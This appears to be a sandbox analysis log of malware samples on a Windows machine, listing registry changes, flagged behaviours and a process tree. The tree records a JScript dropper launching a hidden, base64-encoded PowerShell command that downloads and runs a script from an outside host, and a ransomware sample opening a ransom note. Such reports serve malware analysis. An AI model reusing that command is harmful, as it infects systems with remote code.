| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000200000001000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wordpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wordpad.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\wordpad.exe
"C:\Users\Admin\AppData\Local\Temp\wordpad.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2308 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3828 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4580 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4896 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff674a0ae48,0x7ff674a0ae58,0x7ff674a0ae68
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault65846a50hfc51h4d05h9d25h9864a4563275
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xc0,0x12c,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4268 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5024 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2860 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5184 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5372 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3164 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5480 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3068 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5296 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4000 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5724 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=2516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5728 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5196 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=qrcode_generator.mojom.QRCodeGeneratorService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4400 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -spe -an -ai#7zMap26044:190:7zEvent3368
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=4244 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4776 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\" -spe -an -ai#7zMap27821:190:7zEvent7189
C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe
"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
